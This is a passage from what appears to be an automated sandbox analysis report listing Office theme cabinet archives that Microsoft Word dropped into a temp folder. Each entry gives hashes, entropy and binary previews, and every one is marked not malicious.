                                                Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                                C:\Users\user\AppData\Local\Temp\cabF2B9.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):222992
                                                Entropy (8bit):7.994458910952451
                                                Encrypted:true
                                                SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                Malicious:false
                                                Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                                C:\Users\user\AppData\Local\Temp\cabF359.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):230916
                                                Entropy (8bit):7.994759087207758
                                                Encrypted:true
                                                SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                Malicious:false
                                                Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                                C:\Users\user\AppData\Local\Temp\cabF35A.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):550906
                                                Entropy (8bit):7.998289614787931
                                                Encrypted:true
                                                SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                MD5:1C12315C862A745A647DAD546EB4267E
                                                SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                Malicious:false
                                                Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                                C:\Users\user\AppData\Local\Temp\cabF39C.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):640684
                                                Entropy (8bit):7.99860205353102
                                                Encrypted:true
                                                SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                Malicious:false
                                                Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                                C:\Users\user\AppData\Local\Temp\cabF469.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):698244
                                                Entropy (8bit):7.997838239368002
                                                Encrypted:true
                                                SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                MD5:E29CE2663A56A1444EAA3732FFB82940
                                                SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                Malicious:false
                                                Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                                C:\Users\user\AppData\Local\Temp\cabF46A.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):1065873
                                                Entropy (8bit):7.998277814657051
                                                Encrypted:true
                                                SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                Malicious:false
                                                Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                                C:\Users\user\AppData\Local\Temp\cabF519.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):953453
                                                Entropy (8bit):7.99899040756787
                                                Encrypted:true
                                                SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                Malicious:false
                                                Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                                C:\Users\user\AppData\Local\Temp\cabF654.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):1097591
                                                Entropy (8bit):7.99825462915052
                                                Encrypted:true
                                                SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                Malicious:false
                                                Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                                C:\Users\user\AppData\Local\Temp\cabF730.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):1310275
                                                Entropy (8bit):7.9985829899274385
                                                Encrypted:true
                                                SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                MD5:9C9F49A47222C18025CC25575337A965
                                                SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                Malicious:false
                                                Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                                C:\Users\user\AppData\Local\Temp\cabF82C.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):1766185
                                                Entropy (8bit):7.9991290831091115
                                                Encrypted:true
                                                SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                Malicious:false
                                                Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                                C:\Users\user\AppData\Local\Temp\cabF83D.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):1881952
                                                Entropy (8bit):7.999066394602922
                                                Encrypted:true
                                                SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                Malicious:false
                                                Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                                C:\Users\user\AppData\Local\Temp\cabF94A.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):2591108
                                                Entropy (8bit):7.999030891647433
                                                Encrypted:true
                                                SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                Malicious:false
                                                Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                                C:\Users\user\AppData\Local\Temp\cabFA17.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):2527736
                                                Entropy (8bit):7.992272975565323
                                                Encrypted:true
                                                SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                Malicious:false
